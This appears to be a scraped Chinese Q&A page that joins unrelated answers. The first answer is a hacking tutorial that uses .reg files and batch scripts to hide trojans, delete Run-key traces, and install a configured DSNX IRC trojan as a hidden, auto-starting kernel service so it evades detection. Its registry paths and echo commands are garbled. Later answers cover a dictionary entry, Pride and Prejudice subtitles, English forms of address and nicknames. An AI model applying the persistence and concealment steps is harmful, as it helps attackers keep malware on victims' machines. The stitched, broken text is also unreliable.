在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)关于注册表的操作,常见的是创建、修改、删除。 创建分为两种,一种是创建子项(Subkey)我们创建一个文件,内容如下:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosofthacker]然后执行该脚本,你就已经在HKEY_LOCAL_MACHINESOFTWAREMicrosoft下创建了一个名字为“hacker”的子项。另一种是创建一个项目名称那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:Windows Registry Editor Version 5.00Invader=Ex4rchDoor=C:\WINNT\system32\door.exeAutodos=dword:02这样就在[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下新建了:Invader、door、about这三个项目Invader的类型是“String value”door的类型是“REG SZ value”Autodos的类型是“DWORD value” 我们首先来说说删除一个项目名称,我们创建一个如下的文件:Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]Ex4rch=-执行该脚本,[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下的Ex4rch就被删除了;我们再看看删除一个子项,我们创建一个如下的脚本:Windows Registry Editor Version 5.00[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]执行该脚本,[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]就已经被删除了。相信看到这里,.reg文件你基本已经掌握了。那么的目标就是用批处理来创建特定内容的.reg文件了,记得们前面说道的利用重定向符号可以很容易地创建特定类型的文件。samlpe1:如上面的那个例子,如想生成如下注册表文件Windows Registry Editor Version 5.00door=hex:255Autodos=dword:000000128只需要这样:@echo Windows Registry Editor Version 5.00>>Sample.reg@echo@echo Invader=Ex4rch>>Sample.reg@echo door=5>>C:\WINNT\system32\door.exe>>Sample. reg@echo Autodos=dword:02>>Sample.regsamlpe2:使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows CurrentVersionRun(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为 windrv32.exe)@start windrv32.exe@attrib +h +r windrv32.exe@echo windsnx =- >>patch.dll@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe@regedit /s patch.dll@delete patch.dll@REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动]@REM 这样不是更安全^_^.
2023-06-24 13:27:121


homemade自制的双语对照词典结果:homemade[英]["hu0259u028am"meu026ad][美][u02c8homu02c8med]adj.(衣服、食品等)自家制的; 很高兴为您解答如果你对这个答案有什么疑问,请追问
2023-06-24 13:27:121


thankthanksthank you(very much)30分···楼主想干嘛
2023-06-24 13:27:1112


2023-06-24 13:27:051


有件要紧的事情 As a matter of urgency. 我这次上这儿来 你一定知道我是为了什么原因 You can be at no loss to understand why I am here. 我完全不明白你这次怎么这样看得起我们 会到这种地方来 I cannot account for this honour at all. 我警告你,我是决不肯 让人家来跟我开玩笑的 I warn you, I am not to be trifled with. 我听到一个极其惊人的消息 A most alarming report has reached me. 你快要攀上我的侄儿,达西先生 That you intend to be united with my nephew, Mr Darcy. 虽然我明知这是无稽之谈 虽然我不会那样看不起他,相信他真会 I know this to be a falsehood. Though not wishing to injure him 有这种事情,我还是当机立断 决定上这来一次,把我的意思说给你听 by supposing it possible, I instantly set off to make my sentiments known. 我真奇怪,你既然认为不会有这种事情 何必跑到这么远的地方来? If you believed it impossible, I wonder that you came so far. 我是想亲耳听到这则消息是假的 To hear it contradicted. 如果外界真有这种流言 那么你赶到这反而会弄假成真 Your coming will be a confirmation if such a report exists. 如果?你假扮并无此事? If? You pretend to be ignorant of it? 这不全是你自己拼命传出去的吗? Has it not been industriously circulated by yourself? 我从来没有听见过 I have never heard of it. 你能保证这次是空穴来风? Can you declare there is no foundation for it? 我并不冒充我也向你老人家一样坦白 I do not pretend to possess equal frankness with your Ladyship. 你作为贵妇人可以向我问问题,但同时 我也有权利选择回答或者不回答 You may ask a question which I may choose not to answer. 我的侄子究竟向你求过婚没有? Has my nephew made you an offer of marriage? 你老人家自己刚刚还说过 绝对不会有这种事情 Your Ladyship has declared it to be impossible. 达西先生早跟我的女儿订过婚了 好吧,你还有什么话要说? Mr Darcy is engaged to my daughter. Now what have you to say? 如果他当真如此,那你就没有理由 认为他会向我求婚 If that is the case, you cannot suppose he would make an offer to me. 你真是自私,这门婚事从他们 小时候就已经定下来了 Selfish girl. This union has been planned since their infancy. 但忽然冒出来了个出身卑贱 门户低微的小妮子从中作梗? Do you think it can be prevented by a woman of inferior birth 何况你的妹妹与人私奔的结果是 一门令人感到可耻的,破碎的婚事 whose own sister"s elopement resulted in a scandalously patched-up marriage 还要用舅舅的钱来支付婚事费用 only achieved at the expense of your uncle. 我的上帝啊!难道我们彭布利已经 被你们这些人玷污了么? Heaven and Earth! Are the shades of Pemberley to be thus polluted? 爽爽快快告诉我 你究竟跟她订婚了没有? Tell me once and for all, are you engaged to him? 没有 I am not. 你愿意答应我,永远不跟他订婚吗? Will you promise never to enter into such an engagement? 我不能答应这种事 I will not and I certainly never shall. 你把我侮辱得够了 You have insulted me in every possible way 我不想再讲了 and can now have nothing further to say. 你现在马上给我离开 I must ask you to leave immediately. 晚安 Goodnight. 我一辈子都没有被这样对待过! I have never been thus treated in my entire life!
2023-06-24 13:27:011

这个图片出自哪里 男主是谁

2023-06-24 13:26:592


2023-06-24 13:26:585


同等级的:My Lord/Your Lorship etc.平民对贵族:M" Lord,贵族和人民对国王:Your Majesty/My Lord 自称(非正面会话):Your humble XXXX((e.g servant) 对女性贵族:Your Ladyship如果双方关系很好,私底下会叫别人全名,英国曾经有一个国王就在私底下叫他的母亲作妈妈 额....我平常看的是英文书,翻译成中文可能有错误,请原谅My Lord=M" :Lord=主人Your Majesty=陛下Your humble XXX=卑微的XXXYour Ladyship=夫人小姐Yes,my Lord=是的,主人Your Highness是对王室成员的称呼
2023-06-24 13:26:541


1She didn"t see her teachers again as soon as her gratuation.2This is the first time that she came to the U.S.A..3Xiaoming has already asked the univircity that in NewYork to study there but he doesn"t get the answer.4Jack had gratuded last year, however, he hasn"t find jobs.5He has worked for many years in this company and has more experiments.6Mary had talked to the boss and she will make it possiblely.7Mark read the ad of jobs on the newspaper, and he had prepared his resume.8I havn"t see film for a long time.
2023-06-24 13:26:503


你好,建议情侣网名如下深爱丶爱多深i u261cu2665u261e 久伴丶伴多久i星星会发光 、 u261cu2665u261e 可乐会冒泡 、u029a爱他别骗他u025e u261cu2665u261e u029a爱她别毁她u025e♀空城等她心、 u261cu2665u261e ♂空心等他城、
2023-06-24 13:26:491


Miss Ann
2023-06-24 13:26:472


2023-06-24 13:26:422

在英剧《唐顿庄园》里,有的时候仆人称主人为her ladyship或者your ladyship。

ladyship的属性是her的,不是my的,就像法庭上说法官大人,一定是your honour,不是my honour,表示对所具有属性的一种尊敬
2023-06-24 13:26:391